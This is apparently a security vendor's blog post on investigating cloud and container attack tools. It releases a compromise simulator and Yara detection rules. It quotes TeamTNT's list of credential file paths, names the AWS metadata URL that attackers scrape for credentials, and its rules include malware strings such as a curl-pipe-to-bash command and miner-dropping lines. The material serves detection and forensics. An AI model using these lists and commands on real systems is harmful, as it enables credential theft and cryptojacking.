Blog

Resources for Investigating Cloud and Container Penetration Testing Tools

Cloud and container penetration testing tools are frequently used by real-world attackers. Some of these toolsets are quite innovative, giving adversaries an edge.

As part of this blog, we’ve released three resources:

  • CloudAndContainerCompromiseSimulator – This tool makes a Linux system appear as though it has been victim of a cloud / container-specific attack, while eliminating the inherent risk of running actual live malware in your environment. It is inspired by both malware we have seen previously, and Florian Roth’s APTSimulator tool.
  • Forensic disk images of an Amazon Linux and Amazon Ubuntu system after running CloudCompromiseSimulator against them – These may be useful for testing forensic investigations in cloud and container systems. Note: we have deleted the AWS account that this data is associated with.
  • Yara rules – These rules can be used to detect these attacks.

Executing CloudAndContainerCompromiseSimulator
This script is designed to be very quick to deploy as it doesn’t require the installation of agents or installing servers.

Copy the files to the system with:

git clone https://github.com/cado-security/CloudAndContainerCompromiseSimulator.git

or

wget https://github.com/cado-security/CloudAndContainerCompromiseSimulator/archive/refs/heads/main.zip

Then execute with:

chmod +x ./setup.sh
./setup.sh

The script deploys a number of tools during its execution, almost all of which we’ve seen real-world attackers deploy:

Below we’ve outlined some of the capabilities we’ve seen attackers deploy from these toolsets:

Key Theft
The most complete individual key theft tool we’ve seen is from TeamTNT, which steals keys from a surprisingly large number of tools:

FULL_ARRAY=("/etc/passwd-s3fs" "/etc/davfs2/secrets" "/etc/zypp/credentials.d/NCCcredentials" "/etc/cloudflared/config.yml" "/etc/eksctl/metadata.env")
 
PATH_ARRAY=(".ssh/id_rsa" ".ssh/id_rsa.pub" ".ssh/known_hosts" ".ssh/config" ".ssh/authorized_keys" ".ssh/authorized_keys2" \
 ".aws/config" ".aws/credentials" ".aws/credentials.gpg" ".docker/config.json" ".docker/ca.pem" ".s3backer_passwd" "s3proxy.conf" \
 ".s3ql/authinfo2" ".passwd-s3fs" ".s3cfg" ".git-credentials" ".gitconfig" ".shodan/api_key" ".ngrok2/ngrok.yml" ".purple/accounts.xml" \
 ".config/filezilla/filezilla.xml" ".config/filezilla/recentservers.xml" ".config/hexchat/servlist.conf" ".config/monero-project/monero-core.conf" \
 ".boto" ".netrc" ".config/gcloud/access_tokens.db" ".config/gcloud/credentials.db" ".davfs2/secrets" ".pgpass" ".local/share/jupyter/runtime/notebook_cookie_secret" \
 ".smbclient.conf" ".smbcredentials" ".samba_credentials")

We’ve also seen a number of other cloud penetration testing tools deployed by attackers to steal keys including Peirates, Scout Suite and even Infection Monkey. Oddly, whilst we’ve seen many targeting AWS and GCloud credentials files, we’ve yet to see a real-world attack that specifically steals Azure credentials.

MetaData URLs
Many of the tools also scrape meta-data URLs for credentials to enable lateral movement. In AWS, this means connecting to URLs such as http://169.254.169.254/latest/meta-data/iam/security-credentials/ and exfiltrating the output.

Spreading and Container Escapes
Most of the worms we’ve seen simply scan for completely open Kubernetes and Docker APIs and then spread by spinning up new infected worker containers.

Monero Mining
This isn’t strictly cloud or container specific, but it is the end goal of many attacks against cloud infrastructure, so we thought it was worth including in the simulator.

Detection
Cado provides a number of detections and the ability to hunt for usage of these tools in our cloud forensics platform, Cado Response (screenshots below). We have released Yara rules for the detections of the tools themselves under a friendly Apache 2.0 License.

Yara Rules

/*

 A rule-set for tools commonly seen in cloud and container intrusions

*/


rule cloud_mining_worm {

   meta:

      description = "Detects Common Cloud Mining Worms"
      author = "cdoman@cadosecurity.com"
      date = "2020-08-16"
      license = "Apache License 2.0"
      hash1 = "3a377e5baf2c7095db1d7577339e4eb847ded2bfec1c176251e8b8b0b76d393f"
      hash2 = "929c3017e6391b92b2fbce654cf7f8b0d3d222f96b5b20385059b584975a298b"
      hash3 = "705a22f0266c382c846ee37b8cd544db1ff19980b8a627a4a4f01c1161a71cb0"

   strings:

      $a = "echo $LOCKFILE | base64 -d > $tmpxmrigfile" wide ascii
      $b = "/root/.tmp/xmrig –config=/root/.tmp/" wide ascii
      $c = "if [ -s /usr/bin/curl ]; then" wide ascii
      $d = "echo ‘found: /root/.aws/credentials'" wide ascii
      $e = "function KILLMININGSERVICES(){" wide ascii
      $g = "touch /root/.ssh/authorized_keys 2>/dev/null 1>/dev/null" wide ascii
      $h = "rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service" wide ascii
      $i = "userfile=@/root/.ssh/id_ed25519.pub" wide ascii
      $j = "echo '0' >/proc/sys/kernel/nmi_watchdog" wide ascii
      $k = "curl http://update.aegis.aliyun.com/download/uninstall.sh | bash" wide ascii
      $l = "rm -f /var/tmp/kinsing" wide ascii

   condition:
      filesize < 500KB and any of them
}

rule cryptomining_malware_xmrig_config {
   meta:
      description = "Detects XMRig Config File"
      author = "cdoman@cadosecurity.com"
      date = "2021-06-28"
      license = "Apache License 2.0"
      hash1 = "1085c9211f2af8ddf1588adfb150c64c2b3a2b1c7acf4bc445546455f36299c0"

   strings:
      $ = "\"cpu-affinity\"" nocase wide ascii
      $ = "\"autosave\"" nocase wide ascii
      $ = "\"log-file\"" nocase wide ascii
      $ = "\"max-cpu-usage\"" nocase wide ascii
      $ = "\"donate-level\"" nocase wide ascii
      $ = "\"huge-pages\"" nocase wide ascii
      $ = "\"cpu-priority\"" nocase wide ascii
   condition:
      filesize < 500KB and 5 of them
}

rule cryptomining_malware_xmrig {
   meta:
      description = "Detects XMRig"
      author = "cdoman@cadosecurity.com"
      date = "2021-06-28"
      license = "Apache License 2.0"
      hash1 = "a34ae92c904b60ed7c1dc437493d1b086a828d25c52e5409d2c7b79b880db42f"

   strings:
      $ = "password for mining server" nocase wide ascii
      $ = "threads count to initialize RandomX dataset" nocase wide ascii
      $ = "display this help and exit" nocase wide ascii
      $ = "maximum CPU threads count (in percentage) hint for autoconfig" nocase wide ascii
      $ = "enable CUDA mining backend" nocase wide ascii
      $ = "cryptonight" nocase wide ascii
   condition:
      5 of them
}

rule pentest_tool_peirates {
   meta:
      description = "Detects Peirates"
      author = "cdoman@cadosecurity.com"
      date = "2021-06-28"
      license = "Apache License 2.0"
      hash1 = "a0418d568cfe788fe3d2d0558d70fb6d0e7769a2314c58ca04b57cc3225fe532"

   strings:
      $ = "/var/run/secrets/kubernetes.io/serviceaccount/" nocase wide ascii
      $ = "List of comma-seperated Pods" nocase wide ascii
      $ = "github.com/aws/aws-sdk-go/service/s3" nocase wide ascii
      $ = "S3).ListBucketsRequest" nocase wide ascii
   condition:
      all of them
}

rule pentest_tool_kubeletmein {
   meta:
      description = "Detects kubeletmein"
      author = "cdoman@cadosecurity.com"
      date = "2021-06-28"
      license = "Apache License 2.0"
      hash1 = "112709845dc4ba4edd55747b871542f98ab0307fc8b812fffd5c2a7c3b0801f7"

   strings:
      $ = "github.com/4armed/kubeletmein" nocase wide ascii
      $ = "unable to write kubeconfig file" nocase wide ascii
      $ = "now try: kubectl --kubeconfig" nocase wide ascii
      $ = "EC2Metadata request" nocase wide ascii
   condition:
      all of them
}

rule pentest_tool_dopwn {
   meta:
      description = "Detects dopwn"
      author = "cdoman@cadosecurity.com"
      date = "2021-06-28"
      license = "Apache License 2.0"
      hash1 = "6fae4c6c34478fb515b8510d14071fc955a13e6bfb93121220342fec866317d1"

   strings:
      $ = "grab the digitalocean secret and take over the DO account too" nocase wide ascii
      $ = "registry/clusterrolebindings" nocase wide ascii
      $ = "k8s-ca-cert" nocase wide ascii
   condition:
      all of them
}

rule pentest_tool_deepce {
   meta:
      description = "Detects DeepCE"
      author = "cdoman@cadosecurity.com"
      date = "2021-06-28"
      license = "Apache License 2.0"
      hash1 = ""

   strings:
      $ = "should be used for authorized penetration testing" nocase wide ascii
      $ = "Docker Enumeration, Escalation of Privileges and Container Escapes" nocase wide ascii
      $ = "Are we inside kubenetes?" nocase wide ascii
      $ = "ip route get 1 | head -1" nocase wide ascii
   condition:
      all of them
}

rule pentest_tool_botb {
   meta:
      description = "Detects Break Out The Box"
      author = "cdoman@cadosecurity.com"
      date = "2021-06-28"
      license = "Apache License 2.0"
      hash1 = "3aae4a2bf41aedaa3b12a2a97398fa89a9818b4bec433c20b4e724505277af83"

   strings:
      $ = "github.com/brompwnie/botb" wide ascii
      $ = "/Users/cleroy/go/src" wide ascii
      $ = "Data uploaded to" wide ascii
      $ = "Break Out The Box" wide ascii
   condition:
      all of them
}

rule suspicious_cloud_credentials {
   meta:
      description = "Detects file containing a number of cloud credentials"
      author = "cdoman@cadosecurity.com"
      date = "2021-06-28"
      license = "Apache License 2.0"
      hash1 = "b58cf43cb4b000cb63334a8e20ca53e0112037daa178062c876a395092e1d8ca"

   strings:
      $ = ".aws/credentials" nocase wide ascii
      $ = ".config/gcloud/access_tokens.db" nocase wide ascii
      $ = ".azure/credentials" nocase wide ascii
   condition:
      all of them
}

rule pentest_tool_amicontained {
   meta:
      description = "Detects amicontained"
      author = "cdoman@cadosecurity.com"
      date = "2021-06-28"
      license = "Apache License 2.0"
      hash1 = "d8c49e2cf44ee9668219acd092ed961fc1aa420a6e036e0822d7a31033776c9f"

   strings:
      $ = "github.com/genuinetools/amicontained" wide ascii
      $ = "CFeDIY4Rq5cFO8K/uqDblHUxjlzOmjFpvRg=" wide ascii
      $ = "cpu.processOptions" wide ascii
      $ = "runtime.sendDirect" wide ascii
   condition:
      all of them
}

rule pentest_tool_pillreg {
   meta:
      description = "Detects go-pillage-registries"
      author = "cdoman@cadosecurity.com"
      date = "2021-06-28"
      license = "Apache License 2.0"
      hash1 = ""

   strings:
      $ = "pillage.ImageData" nocase wide ascii
      $ = "pillage.StorageOptions" nocase wide ascii
      $ = "go-pillage-registries" nocase wide ascii
      $ = "pillage.EnumRegistry" nocase wide ascii
   condition:
      all of them
}

About Cado Security

Cado Security provides the first and only cloud-native digital forensics platform for enterprises. By automating data capture and processing across cloud and container environments, Cado Response enables security teams to efficiently investigate and respond to cyber incidents at cloud speed. Backed by Blossom Capital and Ten Eleven Ventures, Cado Security has offices in the United States and United Kingdom. For more information, please visit https://www.cadosecurity.com/ or follow us on Twitter @cadosecurity.

[1]According to the Australia Cyber Security Centre (ACSC), between 1 July 2019 and 30 June 2020, the ACSC responded to 2,266 cybersecurity incidents and received 59,806 cybercrime reports.